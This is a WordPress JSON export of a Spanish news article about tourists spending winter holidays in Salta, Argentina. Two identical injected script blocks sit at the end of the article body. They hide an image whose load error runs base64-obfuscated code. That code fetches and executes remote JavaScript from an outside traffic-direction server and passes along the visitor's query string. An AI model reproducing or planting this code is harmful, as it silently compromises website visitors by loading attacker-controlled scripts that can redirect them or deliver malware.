{"id":2896,"date":"2023-07-24T17:43:48","date_gmt":"2023-07-24T20:43:48","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2896"},"modified":"2025-08-14T00:12:02","modified_gmt":"2025-08-14T03:12:02","slug":"turistas-nacionales-e-internacionales-eligieron-a-salta-para-sus-vacaciones-de-invierno","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2896","title":{"rendered":"Turistas nacionales e internacionales eligieron a Salta para sus vacaciones de invierno"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#a3082f\"><em>La temporada invernal trajo la llegada de turistas de diferentes partes del mundo a la Provincia.<\/em><\/h3>\n\n\n\n<p>Las vacaciones de invierno en La Linda atraen a miles de turistas del pa\u00eds y del exterior que llegan en familia, grupos de amigos o en un paseo solitario por el norte del pa\u00eds como Jean Christophe de Lyon, Francia quien manifest\u00f3 su inter\u00e9s por conocer San Antonio de los Cobres, la puna salte\u00f1a.<br>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8076-turistas-nacionales-e-internacionales-eligieron-a-salta-para-sus-vacaciones-de-invierno.JPG\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8076-turistas-nacionales-e-internacionales-eligieron-a-salta-para-sus-vacaciones-de-invierno.JPG\" alt=\"Turistas nacionales e internacionales eligieron a Salta para sus vacaciones de invierno\" width=\"362\" height=\"242\"\/><\/a><\/figure><\/div>\n\n\n<p>Jean Chirstophe lleg\u00f3 ayer a Salta y esta ma\u00f1ana visit\u00f3 la Catedral y destac\u00f3 la belleza de la iglesia, de su altar y de las im\u00e1genes del Se\u00f1or y la Virgen del Milagro; tiene previsto conocer el cerro San Bernardo y los museos emblem\u00e1ticos de la ciudad.<br>\u00a0<br>De Tres Arroyos, Provincia de Buenos Aires llegaron Romina y Ariel con sus peque\u00f1os Luana, Agostina y Gonzalo. Romina cuenta que en este primer viaje por el norte del pa\u00eds planearon visitar Cafayate y Cachi; en la ciudad se acercar\u00e1n a la Virgen del Cerro y se refirieron a la Catedral y a las Im\u00e1genes como \u201cimpresionantes\u201d.<br>\u00a0<br>Las calles del centro de Salta y otros sitios tur\u00edsticos se encuentran colmados de turistas; la Oficina de Informes del Ministerio de Turismo de Salta recibi\u00f3 consultas en Buenos Aires 93 y en WhatsApp 3872191004.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/fotos\/3948-turistas-nacionales-e-internacionales-eligieron-a-salta-para-sus-vacaciones-de-invierno.JPG\" alt=\"\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La temporada invernal trajo la llegada de turistas de diferentes partes del mundo a la Provincia. Las vacaciones de invierno en La Linda atraen a miles de turistas del pa\u00eds y del exterior que llegan en familia, grupos de amigos o en un paseo solitario por el norte del pa\u00eds como Jean Christophe de Lyon, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2897,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[17],"tags":[],"class_list":{"0":"post-2896","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2896"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2896"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2896\/revisions"}],"predecessor-version":[{"id":7015,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2896\/revisions\/7015"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2897"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2896"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2896"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2896"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}